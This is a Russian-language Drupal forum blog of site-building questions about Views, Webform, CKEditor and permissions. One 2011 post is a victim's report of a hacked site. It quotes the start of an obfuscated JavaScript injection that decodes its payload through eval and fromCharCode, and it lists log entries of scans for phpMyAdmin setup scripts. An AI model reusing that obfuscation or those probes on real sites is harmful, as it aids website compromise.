orel: Блог

Главные вкладки

Views: не фильтрует типы материала с раскрытым фильтром.

30 июня в 0:05

У меня 6 типов материала. Создан вьюс с фильтром по типам материала, где нужно показать материалы 4 типов, а также применить раскрытый фильтр. Получается, что во вьюс попадают все типы материала.

Если убрать раскрытый фильтр, то все работает, т.е. выводятся материалы 4 типов

Страницы (page) тоже не отфильтровываются с раскрытым фильтром. Захожу в логи - ошибок нет.

У меня стоит Content Moderation. Может. он мне создает эту проблему?

Кто пользовался модулем Simplifying?

15 июня в 18:20

Хотела убрать все ненужное при создании материалов (для зарегистрированных пользователей). Убрать удалось. Теперь хочу кое-что вернуть: например, создавать пункты меню. Сняла галочку. Однако ничего не меняется. Дайте совет, пожалуйста, кто пользовался модулем.

CKEditor и вставка текста ctrl+v, но drupal.ru работает копипаст. Как это сделать?

10 июня в 20:12

О том, что копипаст не работает из соображений безопасности, написано https://github.com/ckeditor/ckeditor4/issues/595#issuecomment-317660821 . Однако здесь он работает. Как обойти эту проблему? Или можно только найти и установить более старую версию?

Как изменить вывод представления "Последние материалы", формируемый модулем Аctivity?

10 июня в 20:04

После установки друпала во вьюсах есть блок Recent content, который выводит название материала и время обновления. Ничего менять не стала, установила Аctivity.
Теперь выводятся Последние материалы (всех пользователей) и текущего пользователя. В выводе нет постраничного навигатора, т.е. на 1 странице выводится все, что было опубликовано. Но во вьюсах этого представления нет. Как добавить навигатор? И хотелось бы поменять вывод: например, автор следует после заголовка.

Не могу изменить member for на "зарегистрирован на сайте".

9 июня в 16:26

Много чего перевела при помощи User interface translation. member for типа переведено, так как поиск его не находит. Залезла в user.module.

$fields['user']['user']['display']['member_for'] = [
'label' => t('$fields['user']['user']['display']['member_for'] = [
'label' => t('member for'),
'description' => t("User module 'member for' view element.")'),

Изменила member for в строке 'label' => t('member_for') на "зарегистрирован на сайте". Кэши в системе и браузере очистила.

Если материал в статусе draft, как убрать форму для комментирования?

8 июня в 20:04

Для данного типа материала предусмотрено комментирование. При этом пользователям запрещен доступ к неопубликованным материалам. Форма комментирования здесь ни к чему, и она мешает.
Я могу ее убрать средствами css. Но как запретить вывод формы, если материал не опубликован?

Поскольку удалить тему здесь нельзя, то сама отвечаю: разрешить пользователю запрещать комментирование.

Как зарегистрированным пользователям дать доступ к полям, связанным с пользователем?

8 июня в 11:59

Задача простая: вывожу вьюс со списком пользователей. Добавила поля "Last Access" (Когда последний раз был на сайте) и ссылку на контактную форму. Мне видно все, зарегистрированные пользователи видят только имя.
Значит нужно доступ дать? В 6 версии доступы задавались отдельно по полям.

Почему дубликат views тоже меняется?

8 июня в 9:30

Мне нужно вывести вьюсы в разных местах, которые незначительно отличаются друг от друга (разница в 1-2 полях и фильтрах). Для этого я сделала копию вьюса (дубликат), но там тоже происходят все изменения. Мне нужно их друг от друга открепить, чтобы изменения в одном вьюсе не отражались на другом.

Я все это раньше делала без дубликатов в пределах одного вьюса. Создавала новую страницу или блок. которые редактировались отдельно. Уже проще создать вьюс с нуля, чем думать, что я делаю не так.

У меня проблемы с восьмеркой, которых раньше не было.

Работают ли у вас редакции материалов

7 июня в 2:07

Установила Content Moderation, workflows. Открывается только текущая редакция. Список предыдущих редакций есть, но при переходе по ссылкам открывается страница с сообщением об ошибке.
Если вывести материалы вьюсом с фильтром Опубликовано/Снято с публикации, то действие "Снять с публикации" доступно Администратору, но недоступно зарегистрированным пользователям, хотя разрешения даны. Не знаю, в общем, в чем дело.
Кто этим делом пользуется, работает это у вас?

Не могу выполнить действия через Webform submission operations bulk form.

2 января в 15:01

Сделала views вебформы посредством Webform Views Integration (в друпале 8 пришлось установить этот модуль) - все поля выводятся, как надо, но не работает поле Webform submission operations bulk form, чтобы произвести действия над выбранными отправлениями вебформы.
Не помню, вероятно, Webform Views Integration я устанавливала без композера и webform_views_bulk_operations не установился, как надо.
Хочу спросить у пользователей друпала 8, у кого была эта проблема, как ее решили?

Как рассчитать разницу между числами, введенными в последней и предыдущей отправке веб-формы?

28 декабря 2019 в 10:33

Задача очень простая, но не могу понять, как это сделать. Я сделала форму для отправки показаний счетчиков воды, которые вывожу на странице посредством views. Мне нужно произвести расчет, который показывает разницу между показанием, введенным, например, месяц назад, и текущим показанием. Например, пользователь отправил показание "24", потом "28". Каким образом я могу вывести разницу между этими числами?
Я поняла, как применять функцию суммы, но в данном случае мне нужна функция разницы.

Как в computed twig в webform установить количество цифр после запятой?

21 декабря 2019 в 22:39

Применяя computed twig в webform, получаю цифры, которые нужно округлить, но не могу понять, как там установить количество цифр после запятой.

Как настроить вывод итоговой суммы с отправленной webform.

20 декабря 2019 в 10:12

Использую модули views, Webform Views Integration, Views Aggregator Plus

Всего в таблице 3 поля: номер квартиры, количество горячей воды, куб., количество холодной воды.

Не могу настроить вывод полей по порядку в профиле пользователя в режиме редактирования.

18 декабря 2019 в 0:05

Не могу настроить вывод полей по порядку в профиле пользователя: в режиме просмотра все выводится, как надо, но в режиме редактирования поля не только не группируются, но и не соблюдается необходимый порядок. Как я поняла, это настраивается во вкладке Управление режимами формы на странице /admin/config/people/accounts/form-display , но не получается. Есть зависимость между выводом полей от расположения поля "Имя пользователя и пароль". Я хочу, чтобы это поле находилось в отдельной группе (fieldset) - не получается. В режиме просмотра таких проблем нет.

Как вывести комментарии пользователя в профиле с комментариями определенного пользователя?

18 декабря 2013 в 12:47

На сайте зарегистрированы пользователи в роли «Исполнителей» и один пользователь в роли «Заказчика». Есть страница, где идет общение между исполнителями и заказчиком в виде дерева комментариев.
С помощью views вывела все сообщения каждого исполнителя отдельно в профиль (применила контекстный фильтр Author uid). Теперь необходимо добавить к ним сообщения Заказчика. Пожалуйста, помогите разобраться, как настроить фильтр таким образом, чтобы в профиле публиковались не только собственные сообщения (комментарии), но и сообщения определенного пользователя (Заказчика).

Не выводится сообщение целиком через связку webform, views

28 ноября 2013 в 1:54

Создала форму с помощью webform. Хочу вывести результаты с views блоком (необходимые модули для этого установила).
Проблема в том, что поле с сообщением выводится в обрезанном виде (не более 290 символов) — http://yuryuzan.org/obrashcheniya/obrashcheniya-zhiteley-mikrorayona-yur...

Настройки к полю Trim this field to a maximum length я не отмечала. Хотелось бы понять, как вывести сообщение целиком.

Как подсоединить оригинальную таблицу стилей к определенному типу материла.

4 декабря 2011 в 18:30

Создала новую тему для одного типа материала. При этом подключается прежняя таблица style.css, которая нужна для дефолтной темы (для других материалов) .

Я могу подключить новую таблицу в новом шаблоне, но тогда не подключаются другие стили.

Возможно, нужно что-то добавить в файл info шаблона, чтобы к этому типу материала подключалась другая таблица стилей, но нигде не нахожу инструкции.

Как настроить ссылки, если друпал залит не в корне сайта?

10 ноября 2011 в 17:47

Поскольку корень сайта занят кучей статических html-файлов, решила установить друпал в папке. Получается, что ссылки будут иметь вид: http://site.ru/papka/*, а мне нужны адреса без имени этой папки. Дело в том, что html-страницы хорошо ранжируются поисковиками — необходимо сохранить их адрес, но содержание перевести на друпал.

Можно ли это сделать?

Node Gallery 3: Отображается содержимое только под админом.

14 октября 2011 в 18:04

Не могу самостоятельно решить проблему. Уже целый день бьюсь. Обновила этот модуль.

Галерея создалась. Но если пройти по ссылкам, то ноды у анонимов совершенно пустые — http://design-murashov.ru/galleries
Все разрешения выставила. Под админом все в порядке. В настройках views выставила Access: Unrestricted. Блок галереи тоже отображается только у админа.

Проблемы с глоссарием

6 октября 2011 в 12:39

Создаю алфавитный указатель все материалов с помощью глоссария. Нужно оталфавитить только story сайта, поэтому в фильтре выбрала нужную опцию фильтра. В результате в список попадают только заметки, но общее количество рядом с буквой не соответствует количеству заметок. Количество соотвествует общему числу всех материалов.

Есть страницы с названием из одной цифры, которые не являются заметками. Тем не менее они попали в глоссарий, хотя при нажатии на эти цифры ничего не выводится. Как исключить цифры из глоссария?

Вредоносный код.

29 сентября 2011 в 21:09

28 сентября на сайтах (они на одном аккаунте) обнаружила чужой код — в теге script

b=new function(){return 2;};if(!+b)String.prototype.
test='h'+'arC';for(i in $='b4h3tbn34')if(i=='te'+'st')m=$[i]
;try{new Object().wehweh();}catch(q){ss="";}try{window['e'+'
v'
+'al']('asdas')}catch(q){s=String["fr"+"omC"+m+"od"+'e'];}
d=new Date();d2=new Date(d.valueOf()-2);Object.prototype.asd
='e';if({}.asd==='e')a=document["c"+"r"+"e"+"a"+"t"+"e"+"T"+
"e"+"x"+"t"+"N"+"o"+"d"+"e"]('321');if(a.data==321)x=-1*(d-d
2);n=[-x+7,-x+7,-x+103,-x+100 и еще много цифр с -x+

Он был вставлен на всех файлах tpl.php и html

Несколько лет я уже сталкивалась с такой проблемой — в то время я хранила пароль от ftp в Total Commander, который категорически не рекомендуется для этих целей. С тех времен пользуюсь файлзиллой, которая, как говорят, более безопасна. Пересела на линукс (убунту) , который менее интересен хакерам по сравнению с виндусом.

Как происходил взлом (согласно записям в системном журнале) :

сентябрь 26, 2011 - 13:20 — http://www.rudolfnureyev.org/admin/phpmyadmin/scripts/setup.php
сентябрь 26, 2011 - 12:52 — http://www.rudolfnureyev.org/sqlmanager/scripts/setup.php
сентябрь 26, 2011 - 12:12 — http://www.rudolfnureyev.org/admin/phpmyadmin/scripts/setup.php
сентябрь 26, 2011 - 10:49 — http://www.rudolfnureyev.org/phpmyadm/scripts/setup.php
сентябрь 26, 2011 - 12:45 — http://www.rudolfnureyev.org/pma2005/scripts/setup.php
сентябрь 27, 2011 - 15:27 — http://www.rudolfnureyev.org/j81t0i777m.zip

Не выводятся поля с изображениями на странице термина таксономии

19 сентября 2011 в 15:52

В настройках view: taxonomy_term решила выводить термины, выбрав не Материал, а поля — Заголовок, поле с изображением, тизер, другие текстовые поля, ссылка на полную ноду. Все выводится, кроме изображения. Это происходит только на страницах терминов. Не могу понять, что упустила.

Подключенные скрипты работают только у админа.

6 сентября 2011 в 11:29

Не могу понять одну вещь. Обновила версию — 6.22 (c 6.19). Ранее подключенные скрипты работают только у админа. Как будто скрипты запрещены у пользователей. Сайт pedlar.ru. В шапке справа — картинки: маленькие должны увеличиваться при наведении мышки.

Темизация заголовка материала посредством Rewrite the output of this field — ссылка на полную ноду создается неправильно

30 августа 2011 в 21:16

Используется views. Требуется привести заголовок материала со ссылкой на полную ноду к виду:
<h2><a href="Ссылка на полную ноду">Заголовок</a></h2>